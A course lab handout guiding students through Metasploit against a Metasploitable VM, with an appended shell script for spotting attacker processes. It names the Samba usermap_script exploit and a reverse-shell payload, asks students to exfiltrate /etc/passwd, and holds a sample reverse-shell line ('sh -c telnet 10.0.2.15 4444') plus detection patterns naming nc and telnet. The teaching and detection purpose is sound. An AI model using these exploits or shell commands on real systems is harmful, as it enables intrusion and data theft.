Folder: attacks
File: attacks/metasploit.pdf
Follow the partner policy.
This assignment will give you a brief tour of some of the capabilities of Metasploit, a security tool that supports the development and use of vulnerability exploits. Like any tool (e.g. a good sharp knife), Metasploit can be used for good or evil. When we take the perspective of penetration testers interested in helping organizations enhance their security, a tool like Metasploit is invaluable.
Nothing to hand in for this part, but you'll need to understand the material in Part 1 to do Parts 2, 3, and 4.
Launch your virtual machines
Fire up VirtualBox and launch both the Kali and Metasploitable VMs. Log in to both (recall that the user name and password for Metasploitable are both "msfadmin").
On Metasploitable, run "ifconfig" and check the IP address for eth0. For my setup, it's 10.0.2.4. Doing the same on Kali gives me 10.0.2.15. So every time I mention 10.0.2.4 below, I'm talking about Metasploitable's eth0 IP address, and 10.0.2.15 is my Kali eth0 IP address. If your eth0 addresses are different, adjust your commands in the following stages accordingly.
When you're hunting for vulnerabilities on a target system, you can end up collecting a lot of information. To help you keep track, Metasploit supports a database that is automatically populated with the information you uncover.
To start using the Metasploit database, here's what you do.
Most of the rest of your work will take place in the Metasploit Framework Console, a command-line interface. Just run this in your Kali terminal:
That should give you a "msf6 >" prompt.
(HEY, READ THIS: From here on out, unless I specify otherwise, all commands are to be issued at the msfconsole prompt.)
You can separate your msfconsole and database collections into "workspaces" to help you keep track of different projects. Create a new workspace:
You can take a look at the available workspaces:
or switch between workspaces:
To do an nmap-based host discovery like you did in your first pen-testing assignment, you use "db_nmap" at the msfconsole prompt. (The beautiful thing about doing this instead of "nmap" at the Linux prompt is that Metasploit will run the command and store the results in the Metasploit database, where you'll be able to retrieve those results easily later.)
Now you can take a look at the hosts discovered:
Suppose you want to do an "aggressive" scan of 10.0.2.4 for open ports and the services running on them.
Once that scan is complete, you can take a look at the services that the scan discovered:
Since we've now learned more about 10.0.2.4 than we knew before, try doing the "hosts" command again. Do you see a change since you last executed "hosts"? (You should. And this illustrates some of the power of having an automatically populated database. You don't have to save the results of db_nmap yourself; Metasploit does it for you.)
Now that you have a list of services on the target machine, you can use that list to investigate possible attacks. There are more sophisticated ways to do this, but let's start simple: we'll search the internet for exploits.
Note that an exploit is a piece of code that runs on our own machine and attempts to take advantage of a bug in some server software to enable us to do something to the target machine. When we run an exploit, we usually provide the exploit with a payload, that is, a piece of software that will run on the target machine to accomplish our goals. A very common (and desirable) payload type is a shell—that is, an interface through which we can execute arbitrary commands on the target system.
In our case, when I ran a port scan on 10.0.2.4 (my Metasploitable's IP address) and then looked at the available services, one of the services I saw was a version of the Samba file server software:
Googling for "Samba smbd 3.X - 4.X workgroup: WORKGROUP vulnerabilities", I found myself at this Rapid7 vulnerability database page (note that Rapid7 owns and maintains the Metasploit project). This page tells me to try the "exploit/multi/samba/usermap_script" module. So:
This causes my msfconsole prompt to reflect the module I'm currently using:
This prompt doesn't mean that I've already launched my attack with this exploit. It just says "you're working on the usermap_script exploit". There are several steps left before I'm ready to actually launch the attack against Metasploitable.
Once I'm using my particular exploit, I need to set up its parameters, known in Metasploit as "options". First step, see what those options are:
This gives me a listing like this:
The RHOST option obviously needs to be set, to tell the exploit what IP address we're attacking. Assuming 10.0.2.4 is my target machine's IP:
Then run "show options" again to see if things are set the way you want them.
Next up, find out what payloads Metasploit has that are compatible with our exploit:
In this case, we get a long list of possible payloads. One of the command-shell payloads listed is "cmd/unix/reverse" (where "reverse" refers to a "reverse TCP shell" in which the payload running on the target machine initiates a TCP connection with our attacking machine rather than the other way around). To set up the payload:
Then see what options the payload requires:
The required option we see now is LHOST. It's possible Metasploit pre-filled LHOST with 10.0.2.15 (Kali's eth0 address). But if LHOST's current setting is blank, do this:
Now we're all set to try out the attack.
Do you get a shell? The exploit's own logging message might tell you yes or no. If you do, it's likely you won't see a prompt. So just try a Unix command like "ls -l" or "pwd" to figure out what directory you're in. You can also try the "whoami" command in this illicit non-prompt prompt. When I do so, I get "root", which tells me that I'm free to wreak a great deal of havoc on the Metasploitable machine.
Metasploitable is set up with a ton of vulnerabilities. Your job for this section is to find a Metasploitable vulnerability that you find interesting, and describe it to me.
When you're choosing your payload for your exploit, I want you to try the exploit with at least two different payloads. Spend a little time exploring the capabilities of your payloads both by experimentation and by reading online so you can describe their differences.
I will also ask you to describe a technique that enables you to "exfiltrate" data from the target machine (Metasploitable) to your attacking machine (Kali). Try, for example, to transfer the file /etc/passwd to your attacking machine. At minimum, this should give you a list of user names found on the target machine.
Your description of your chosen exploit will consist of these parts:
When your payload is running on the target machine and you are doing whatever you're doing, is there a way that your activity might be detected? For Part 3, I want you to describe in concise detail at least one way that you could be spotted.
Hint: I recommend investigating the features of the "ps" command. You can then pretend to be the sysadmin of the target machine by logging in to Metasploitable while, on the attacking machine, Metasploit is running an exploit. Then, as sysadmin, can you see in the ps output any evidence of the attacker?
There are other ways to detect attacker activity. I'm happy to hear about any of them in Part 3.
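As an added example (not part of the handout), here is one way to turn the ps hint into a repeatable check: a POSIX shell function that walks the process tree in a "ps -eo pid,ppid,user,comm,args" listing and flags shells or network clients that descend from a daemon such as smbd, or that dial out to an IP address and port. The embedded listing is constructed for illustration; the 10.0.2.15:4444 endpoint and the smbd ancestry are assumptions about what a reverse shell spawned through the Samba exploit might look like, not captured output.

```shell
#!/bin/sh
# Constructed sample of `ps -eo pid,ppid,user,comm,args` output from the target.
# Pids 4410-4420 imitate a shell that smbd spawned and that reaches back to the
# attacker's address; real output will differ in detail.
SAMPLE_PS='  PID  PPID USER     COMMAND         COMMAND
    1     0 root     init            /sbin/init
  540     1 root     sshd            /usr/sbin/sshd
 1203     1 root     smbd            /usr/sbin/smbd -D
 1207  1203 root     smbd            /usr/sbin/smbd -D
 4410  1207 root     sh              sh -c telnet 10.0.2.15 4444
 4412  4410 root     telnet          telnet 10.0.2.15 4444
 4420  4410 root     sh              sh'

# Report every shell or network client that descends from a daemon which should
# never spawn one (smbd, nmbd, apache2, ...), or that dials out to an IP:port.
# Prints one line per finding; exit status 0 if anything was found, 1 if not.
# sshd is deliberately not in the daemon list: interactive logins live under it.
find_suspicious() {
    printf '%s\n' "$1" | awk '
    NR == 1 { next }                               # header line
    {
        ppid[$1] = $2; comm[$1] = $4; order[NR] = $1
        a = ""; for (i = 5; i <= NF; i++) a = a (i > 5 ? " " : "") $i
        args[$1] = a                               # full command line
    }
    END {
        found = 0
        for (n = 2; n <= NR; n++) {
            p = order[n]
            if (comm[p] !~ /^(sh|bash|dash|telnet|nc|ncat|perl|python)$/) continue
            hit = ""; a = ppid[p]
            while (a in ppid) {                    # walk up the ancestry
                if (comm[a] ~ /^(smbd|nmbd|apache2|httpd|vsftpd|proftpd)$/) { hit = comm[a]; break }
                a = ppid[a]
            }
            if (hit != "") {
                printf "pid %s (%s) descends from %s: %s\n", p, comm[p], hit, args[p]; found++
            } else if (args[p] ~ /(^|[ \t])(telnet|nc|ncat)[ \t]+[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+[ \t]+[0-9]+/) {
                printf "pid %s (%s) dials out: %s\n", p, comm[p], args[p]; found++
            }
        }
        exit (found ? 0 : 1)
    }'
}

# Run against the constructed sample; on Metasploitable itself you would pass
# "$(ps -eo pid,ppid,user,comm,args)" instead.
find_suspicious "$SAMPLE_PS"
```

The ancestry check matters more than the command-line check: an attacker can rename or wrap the client, but a shell whose parent is the file server is hard to explain away.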
Tell me something you found interesting while you were getting to know Metasploit.
Give me a PDF file named attacks/metasploit.pdf containing:
Thanks so much for being a great group this term. I enjoyed working with you all. Have a wonderful summer, and if you're graduating, congratulations and good luck out there! I love hearing from former students, so if you feel like it, please keep in touch.